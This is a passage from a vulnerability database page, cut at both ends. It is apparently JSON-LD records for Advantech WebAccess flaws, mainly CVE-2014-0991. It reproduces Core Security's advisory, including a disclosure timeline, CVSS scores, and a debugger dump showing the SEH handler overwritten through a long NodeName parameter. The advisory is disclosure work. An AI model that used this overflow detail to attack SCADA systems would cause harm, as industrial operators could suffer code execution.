"https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-20", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-107707" }, { "db": "JVNDB", "id": "JVNDB-2017-011766" }, { "db": "NVD", "id": "CVE-2017-16753" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.6, "url": "https://ics-cert.us-cert.gov/advisories/icsa-18-004-02" }, { "trust": 2.5, "url": "http://www.securityfocus.com/bid/102424" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-16753" }, { "trust": 0.8, "url": "https://ics-cert.us-cert.gov/advisories/icsa-18-004-02a" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-16753" }, { "trust": 0.3, "url": "http://webaccess.advantech.com" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2018-00672" }, { "db": "VULHUB", "id": "VHN-107707" }, { "db": "BID", "id": "102424" }, { "db": "JVNDB", "id": "JVNDB-2017-011766" }, { "db": "CNNVD", "id": "CNNVD-201801-240" }, { "db": "NVD", "id": "CVE-2017-16753" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "e2e0e090-39ab-11e9-b212-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-00672" }, { "db": "VULHUB", "id": "VHN-107707" }, { "db": "BID", "id": "102424" }, { "db": "JVNDB", "id": "JVNDB-2017-011766" }, { "db": "CNNVD", "id": "CNNVD-201801-240" }, { "db": "NVD", "id": "CVE-2017-16753" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2018-01-10T00:00:00", "db": "IVD", "id": "e2e0e090-39ab-11e9-b212-000c29342cb1" }, { "date": "2018-01-10T00:00:00", "db": "CNVD", "id": "CNVD-2018-00672" }, { "date": "2018-01-05T00:00:00", "db": "VULHUB", "id": "VHN-107707" }, { "date": "2018-01-04T00:00:00", "db": "BID", "id": "102424" }, { "date": "2018-01-25T00:00:00", "db": "JVNDB", "id": "JVNDB-2017-011766" }, { "date": "2018-01-08T00:00:00", "db": "CNNVD", "id": "CNNVD-201801-240" }, { "date": "2018-01-05T08:29:00.427000", "db": "NVD", "id": "CVE-2017-16753" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2018-01-10T00:00:00", "db": "CNVD", "id": "CNVD-2018-00672" }, { "date": "2019-10-09T00:00:00", "db": "VULHUB", "id": "VHN-107707" }, { "date": "2018-01-04T00:00:00", "db": "BID", "id": "102424" }, { "date": "2018-04-03T00:00:00", "db": "JVNDB", "id": "JVNDB-2017-011766" }, { "date": "2019-10-17T00:00:00", "db": "CNNVD", "id": "CNNVD-201801-240" }, { "date": "2024-11-21T03:16:54.020000", "db": "NVD", "id": "CVE-2017-16753" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201801-240" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess Input validation vulnerability", "sources": [ { "db": "IVD", "id": "e2e0e090-39ab-11e9-b212-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-00672" }, { "db": "JVNDB", "id": "JVNDB-2017-011766" }, { "db": "CNNVD", "id": "CNNVD-201801-240" } ], "trust": 2.2 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Input validation error", "sources": [ { "db": "IVD", "id": "e2e0e090-39ab-11e9-b212-000c29342cb1" }, { "db": "CNNVD", "id": "CNNVD-201801-240" } ], "trust": 0.8 } }
var-201409-0445
Vulnerability from variot
Stack-based buffer overflow in Advantech WebAccess (formerly BroadWin WebAccess) 7.2 allows remote attackers to execute arbitrary code via the projectname parameter. Advantech WebAccess is an IE-based HMI/SCADA monitoring software that features all engineering projects, database setup, drawing and software management using a standard browser over the internet or intranet. A buffer overflow vulnerability exists in Advantech WebAccess. An attacker exploits a vulnerability to execute arbitrary code in the context of an affected application or to crash the entire application. Advantech WebAccess is prone to a stack-based buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer. Failed exploit attempts will likely cause a denial-of-service condition. Advantech WebAccess 7.2 is vulnerable; other versions may also be affected. Advantech WebAccess is a browser-based HMI/SCADA software developed by Advantech. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment. Core Security - Corelabs Advisory http://corelabs.coresecurity.com/
Advantech WebAccess Vulnerabilities
-
Advisory Information
Title: Advantech WebAccess Vulnerabilities Advisory ID: CORE-2014-0005 Advisory URL: http://www.coresecurity.com/advisories/advantech-webaccess-vulnerabilities Date published: 2014-09-02 Date of last update: 2014-09-01 Vendors contacted: Advantech Release mode: User release
-
Vulnerability Description
Advantech WebAccess [1] is a browser-based software package for human-machine interfaces HMI, and supervisory control and data acquisition SCADA.
-
WebAccess 7.2 .
-
Non-vulnerable packages
. AdvantechWebAccessUSANode_20140730_3.4.3
-
Vendor Information, Solutions and Workarounds
Advantech has addressed the vulnerability in WebAccess by issuing an update located at http://webaccess.advantech.com/downloads_software.php
Given that this is a client-side vulnerability, affected users should avoid opening untrusted '.html' files. Core Security also recommends those affected use third party software such as Sentinel [4] or EMET [3] that could help to prevent the exploitation of affected systems to some extent.
-
Credits
This vulnerability was discovered and researched by Ricardo Narvaja from Core Security Exploit Writers Team.
Core Security Advisories Team would also like to thank ICS-CERT Coordination Center for their assistance during the vulnerability reporting process.
-
Below is shown the result of opening a malicious html file with a long NodeName parameter, an attacker can overflow the stack buffer mentioned above and overwrite the SEH (Structured Exception Handler), enabling arbitrary code execution on the machine.
/-----
EAX 03A39942 ASCII "BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB..." ECX 0162B720 EDX 01630000 xpsp2res.01630000 EBX 0162B720 ESP 0162B454 EBP 0162B460 ESI 0162B4D8 EDI 03A31E98 EIP 064EA6D4 webvact.064EA6D4
-----/
/-----
SEH chain of thread 000016CC Address SE handler 0162DB40 42424242
-----/
-
Report Timeline . 2014-05-06: Core Security notifies Advantech of the vulnerability. Publication date is set for May 26th, 2014. 2014-05-09: CORE asks for a reply. 2014-05-26: First release date missed. 2014-05-26: Core Security notifies that the issues were reported 2 weeks ago and there was no reply since May 6th, 2014. 2014-05-29: Core Security contacts the ICS-CERT for assistance in order to coordinate the disclosure of the advisory. 2014-05-29: ICS-CERT acknowledges Core Security e-mail, and asks for a technical description of the vulnerability. 2014-05-29: Core Security sends technical details to the ICS-CERT. 2014-06-05: ICS-CERT team notifies that they have contacted the vendor and that they will notify us once the vendor has validated the vulnerabilities. 2014-06-18: ICS-CERT team notifies that the vendor is working in a new release, expected to be released in September, and ask if Core Security is interested in validating Advantech's vulnerability fix in their beta version. 2014-06-18: Core Security accepts the testing of the vendor beta version, but shares their concerns about waiting several months for fixes that are related to vulnerabilities already public. 2014-06-18: ICS-CERT notifies that they will let us know when they plan to make the beta version available for testing. 2014-07-03: ICS-CERT team notifies that the vendor is working to provide a download link for the beta version. 2014-07-08: ICS-CERT team sends download link provided by the vendor. 2014-07-10: Core Security confirms to ICS-CERT that the new version it's still vulnerable, and comments that after some analysis the vulnerable function doesn't has changes. 2014-07-10: ICS-CERT notifies that they will let the vendor know that that the vulnerabilities still exist. And asks to setup a teleconference between Core Security, the CERT and the vendor. 2014-07-10: Core Security notifies the ICS-CERT that all interactions are made via email only. 2014-07-10: ICS-CERT notifies they provided the information to the vendor. 2014-07-21: Core Security notifies the ICS-CERT that Tipping Point Zero Day Initiative has released several advisories[2] affecting the vendor including some that appears to be related to the one we are coordinating. 2014-07-21: ICS-CERT notifies that some of those advisories where in coordination with them, and that after a review of the link shared by Core Security are related to ICSA-14-198-02 and don't appear to be related to the reported vulnerability. 2014-07-21: Core Security notifies that ZDI-14-243 and ZDI-14-244 appears to be directly related. 2014-07-21: ICS-CERT is trying to contact Advantech to get a status update and their current plan for vulnerability remediation. 2014-08-07: ICS-CERT notifies that they contacted the vendor and they are waiting for an status update. 2014-08-21: Core Security contacts ICS-CERT since no reply was received in the past two weeks. 2014-08-21: ICS-CERT notifies that vendor representative stated that they are currently training a new product manager and they have not yet responded to the vulnerabilities we are discussing. 2014-08-28: Core Security notifies the ICS-CERT that the advisory publication is going to be scheduled for Monday 1st of September. 2014-08-28: ICS-CERT acknowledges Core Security e-mail. 2014-08-28: Core Security re-schedules the advisory publication for Sep 2nd, 2014. 2014-09-02: Core Security found out that the vendor released a silent fix on 30th of July. 2014-09-02: Core Security releases the advisory CORE-2014-0005 tagged as user-release.
-
References
[1] http://webaccess.advantech.com/. [2] http://www.zerodayinitiative.com/advisories/published/. [3] http://support.microsoft.com/kb/2458544. [4] https://github.com/CoreSecurity/sentinel.
-
About CoreLabs
CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.
-
About Core Security Technologies
Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.
-
Disclaimer
The contents of this advisory are copyright (c) 2014 Core Security and (c) 2014 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
-
PGP/GPG Keys
This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201409-0445", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "eq", "trust": 3.0, "vendor": "advantech", "version": "7.2" }, { "model": null, "scope": "eq", "trust": 0.4, "vendor": "advantech webaccess", "version": "7.2" } ], "sources": [ { "db": "IVD", "id": "3a306310-1ec1-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "d278c6b4-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-05417" }, { "db": "JVNDB", "id": "JVNDB-2014-004358" }, { "db": "CNNVD", "id": "CNNVD-201409-738" }, { "db": "NVD", "id": "CVE-2014-0991" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-004358" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Ricardo Narvaja", "sources": [ { "db": "BID", "id": "69536" } ], "trust": 0.3 }, "cve": "CVE-2014-0991", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "CVE-2014-0991", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 1.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2014-05417", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "3a306310-1ec1-11e6-abef-000c29c66e3d", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "d278c6b4-2351-11e6-abef-000c29c66e3d", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "VHN-68484", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:M/AU:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2014-0991", "trust": 1.0, "value": "MEDIUM" }, { "author": "NVD", "id": "CVE-2014-0991", "trust": 0.8, "value": "Medium" }, { "author": "CNVD", "id": "CNVD-2014-05417", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201409-738", "trust": 0.6, "value": "MEDIUM" }, { "author": "IVD", "id": "3a306310-1ec1-11e6-abef-000c29c66e3d", "trust": 0.2, "value": "MEDIUM" }, { "author": "IVD", "id": "d278c6b4-2351-11e6-abef-000c29c66e3d", "trust": 0.2, "value": "MEDIUM" }, { "author": "VULHUB", "id": "VHN-68484", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "IVD", "id": "3a306310-1ec1-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "d278c6b4-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-05417" }, { "db": "VULHUB", "id": "VHN-68484" }, { "db": "JVNDB", "id": "JVNDB-2014-004358" }, { "db": "CNNVD", "id": "CNNVD-201409-738" }, { "db": "NVD", "id": "CVE-2014-0991" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Stack-based buffer overflow in Advantech WebAccess (formerly BroadWin WebAccess) 7.2 allows remote attackers to execute arbitrary code via the projectname parameter. Advantech WebAccess is an IE-based HMI/SCADA monitoring software that features all engineering projects, database setup, drawing and software management using a standard browser over the internet or intranet. A buffer overflow vulnerability exists in Advantech WebAccess. An attacker exploits a vulnerability to execute arbitrary code in the context of an affected application or to crash the entire application. Advantech WebAccess is prone to a stack-based buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer. Failed exploit attempts will likely cause a denial-of-service condition. \nAdvantech WebAccess 7.2 is vulnerable; other versions may also be affected. Advantech WebAccess is a browser-based HMI/SCADA software developed by Advantech. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment. Core Security - Corelabs Advisory\nhttp://corelabs.coresecurity.com/\n\nAdvantech WebAccess Vulnerabilities\n\n\n1. *Advisory Information*\n\n Title: Advantech WebAccess Vulnerabilities\n Advisory ID: CORE-2014-0005\n Advisory URL:\nhttp://www.coresecurity.com/advisories/advantech-webaccess-vulnerabilities\n Date published: 2014-09-02\n Date of last update: 2014-09-01\n Vendors contacted: Advantech\n Release mode: User release\n\n\n2. *Vulnerability Description*\n\n Advantech WebAccess [1] is a browser-based\n software package for human-machine interfaces HMI, and supervisory\n control and data acquisition SCADA. \n\n\n4. WebAccess 7.2\n . \n\n\n5. *Non-vulnerable packages*\n\n . AdvantechWebAccessUSANode_20140730_3.4.3\n\n\n6. *Vendor Information, Solutions and Workarounds*\n\n Advantech has addressed the vulnerability in WebAccess by issuing an\nupdate located at\n http://webaccess.advantech.com/downloads_software.php\n\n Given that this is a client-side vulnerability, affected users\nshould avoid\n opening untrusted \u0027.html\u0027 files. \n Core Security also recommends those affected use third party\nsoftware such as\n Sentinel [4] or EMET [3]\n that could help to prevent the exploitation of affected systems to\nsome extent. \n\n\n7. *Credits*\n\n This vulnerability was discovered and researched by Ricardo Narvaja\nfrom\n Core Security Exploit Writers Team. \n \n Core Security Advisories Team would also like to thank ICS-CERT\nCoordination Center\n for their assistance during the vulnerability reporting process. \n \n\n8. \n\n Below is shown the result of opening a malicious html file with a long\n NodeName parameter, an attacker can overflow the stack buffer mentioned\n above and overwrite the SEH (Structured Exception Handler), enabling\n arbitrary code execution on the machine. \n\n/-----\n \nEAX 03A39942 ASCII \"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB...\"\nECX 0162B720\nEDX 01630000 xpsp2res.01630000\nEBX 0162B720\nESP 0162B454\nEBP 0162B460\nESI 0162B4D8\nEDI 03A31E98\nEIP 064EA6D4 webvact.064EA6D4\n\n-----/\n\n\n/-----\n \nSEH chain of thread 000016CC\nAddress SE handler\n0162DB40 42424242\n\n-----/\n\n\n9. *Report Timeline*\n . 2014-05-06: Core Security notifies Advantech of the vulnerability. \nPublication date is set for May 26th, 2014. 2014-05-09: CORE asks for a reply. 2014-05-26: First release date missed. 2014-05-26: Core Security notifies that the issues were reported 2\nweeks ago and there was no reply since May 6th, 2014. 2014-05-29: Core Security contacts the ICS-CERT for assistance in\norder to coordinate the disclosure of the advisory. 2014-05-29: ICS-CERT acknowledges Core Security e-mail, and asks\nfor a technical description of the vulnerability. 2014-05-29: Core Security sends technical details to the ICS-CERT. 2014-06-05: ICS-CERT team notifies that they have contacted the\nvendor and that they will notify us once the vendor has validated the\nvulnerabilities. 2014-06-18: ICS-CERT team notifies that the vendor is working in a\nnew release, expected to be released in September, and ask if Core\nSecurity is interested in validating Advantech\u0027s vulnerability fix in\ntheir beta version. 2014-06-18: Core Security accepts the testing of the vendor beta\nversion, but shares their concerns about waiting several months for\nfixes that are related to vulnerabilities already public. 2014-06-18: ICS-CERT notifies that they will let us know when they\nplan to make the beta version available for testing. 2014-07-03: ICS-CERT team notifies that the vendor is working to\nprovide a download link for the beta version. 2014-07-08: ICS-CERT team sends download link provided by the vendor. 2014-07-10: Core Security confirms to ICS-CERT that the new\nversion it\u0027s still vulnerable, and comments that after some analysis the\nvulnerable function doesn\u0027t has changes. 2014-07-10: ICS-CERT notifies that they will let the vendor know\nthat that the vulnerabilities still exist. And asks to setup a\nteleconference between Core Security, the CERT and the vendor. 2014-07-10: Core Security notifies the ICS-CERT that all\ninteractions are made via email only. 2014-07-10: ICS-CERT notifies they provided the information to the\nvendor. 2014-07-21: Core Security notifies the ICS-CERT that Tipping Point\nZero Day Initiative has released several advisories[2] affecting the\nvendor including some that appears to be related to the one we are\ncoordinating. 2014-07-21: ICS-CERT notifies that some of those advisories where\nin coordination with them, and that after a review of the link shared by\nCore Security are related to ICSA-14-198-02 and don\u0027t appear to be\nrelated to the reported vulnerability. 2014-07-21: Core Security notifies that ZDI-14-243 and ZDI-14-244\nappears to be directly related. 2014-07-21: ICS-CERT is trying to contact Advantech to get a\nstatus update and their current plan for vulnerability remediation. 2014-08-07: ICS-CERT notifies that they contacted the vendor and\nthey are waiting for an status update. 2014-08-21: Core Security contacts ICS-CERT since no reply was\nreceived in the past two weeks. 2014-08-21: ICS-CERT notifies that vendor representative stated\nthat they are currently training a new product manager and they have not\nyet responded to the vulnerabilities we are discussing. 2014-08-28: Core Security notifies the ICS-CERT that the advisory\npublication is going to be scheduled for Monday 1st of September. 2014-08-28: ICS-CERT acknowledges Core Security e-mail. 2014-08-28: Core Security re-schedules the advisory publication\nfor Sep 2nd, 2014. 2014-09-02: Core Security found out that the vendor released a\nsilent fix on 30th of July. 2014-09-02: Core Security releases the advisory CORE-2014-0005\ntagged as user-release. \n\n\n10. *References*\n\n [1] http://webaccess.advantech.com/. \n [2] http://www.zerodayinitiative.com/advisories/published/. \n [3] http://support.microsoft.com/kb/2458544. \n [4] https://github.com/CoreSecurity/sentinel. \n\n\n11. *About CoreLabs*\n\n CoreLabs, the research center of Core Security, is charged with\nanticipating\n the future needs and requirements for information security\ntechnologies. \n We conduct our research in several important areas of computer security\n including system vulnerabilities, cyber attack planning and simulation,\n source code auditing, and cryptography. Our results include problem\n formalization, identification of vulnerabilities, novel solutions and\n prototypes for new technologies. CoreLabs regularly publishes security\n advisories, technical papers, project information and shared software\n tools for public use at:\n http://corelabs.coresecurity.com. \n\n\n12. *About Core Security Technologies*\n\n Core Security Technologies enables organizations to get ahead of threats\n with security test and measurement solutions that continuously identify\n and demonstrate real-world exposures to their most critical assets. Our\n customers can gain real visibility into their security standing, real\n validation of their security controls, and real metrics to more\n effectively secure their organizations. \n\n Core Security\u0027s software solutions build on over a decade of trusted\n research and leading-edge threat expertise from the company\u0027s Security\n Consulting Services, CoreLabs and Engineering groups. Core Security\n Technologies can be reached at +1 (617) 399-6980 or on the Web at:\n http://www.coresecurity.com. \n\n\n13. *Disclaimer*\n\n The contents of this advisory are copyright\n (c) 2014 Core Security and (c) 2014 CoreLabs,\n and are licensed under a Creative Commons\n Attribution Non-Commercial Share-Alike 3.0 (United States) License:\n http://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n\n14. *PGP/GPG Keys*\n\n This advisory has been signed with the GPG key of Core Security\nadvisories\n team, which is available for download at\n \nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc", "sources": [ { "db": "NVD", "id": "CVE-2014-0991" }, { "db": "JVNDB", "id": "JVNDB-2014-004358" }, { "db": "CNVD", "id": "CNVD-2014-05417" }, { "db": "BID", "id": "69536" }, { "db": "IVD", "id": "3a306310-1ec1-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "d278c6b4-2351-11e6-abef-000c29c66e3d" }, { "db": "VULHUB", "id": "VHN-68484" }, { "db": "PACKETSTORM", "id": "128120" } ], "trust": 2.97 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2014-0991", "trust": 3.9 }, { "db": "ICS CERT", "id": "ICSA-14-261-01", "trust": 3.1 }, { "db": "BID", "id": "69536", "trust": 2.0 }, { "db": "CNNVD", "id": "CNNVD-201409-738", "trust": 1.1 }, { "db": "CNVD", "id": "CNVD-2014-05417", "trust": 1.0 }, { "db": "JVNDB", "id": "JVNDB-2014-004358", "trust": 0.8 }, { "db": "OSVDB", "id": "110686", "trust": 0.6 }, { "db": "CXSECURITY", "id": "WLB-2014090006", "trust": 0.6 }, { "db": "IVD", "id": "3A306310-1EC1-11E6-ABEF-000C29C66E3D", "trust": 0.2 }, { "db": "IVD", "id": "D278C6B4-2351-11E6-ABEF-000C29C66E3D", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-68484", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "128120", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "3a306310-1ec1-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "d278c6b4-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-05417" }, { "db": "VULHUB", "id": "VHN-68484" }, { "db": "BID", "id": "69536" }, { "db": "JVNDB", "id": "JVNDB-2014-004358" }, { "db": "PACKETSTORM", "id": "128120" }, { "db": "CNNVD", "id": "CNNVD-201409-738" }, { "db": "NVD", "id": "CVE-2014-0991" } ] }, "id": "VAR-201409-0445", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "3a306310-1ec1-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "d278c6b4-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-05417" }, { "db": "VULHUB", "id": "VHN-68484" } ], "trust": 1.53470696 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 1.0 } ], "sources": [ { "db": "IVD", "id": "3a306310-1ec1-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "d278c6b4-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-05417" } ] }, "last_update_date": "2024-11-23T22:38:56.066000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Advantech WebAccess", "trust": 0.8, "url": "http://www.advantech.co.jp/products/GF-1M94V/Advantech-WebAccess/mod_B975C492-56B3-4EBA-8BBB-5B6D3483EE9D.aspx" }, { "title": "Patch for Advantech WebAccess Buffer Overflow Vulnerability (CNVD-2014-05417)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/53297" }, { "title": "AdvantechWebAccessUSANode_20140730_3.4.3", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=51645" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2014-05417" }, { "db": "JVNDB", "id": "JVNDB-2014-004358" }, { "db": "CNNVD", "id": "CNNVD-201409-738" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-119", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-68484" }, { "db": "JVNDB", "id": "JVNDB-2014-004358" }, { "db": "NVD", "id": "CVE-2014-0991" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { 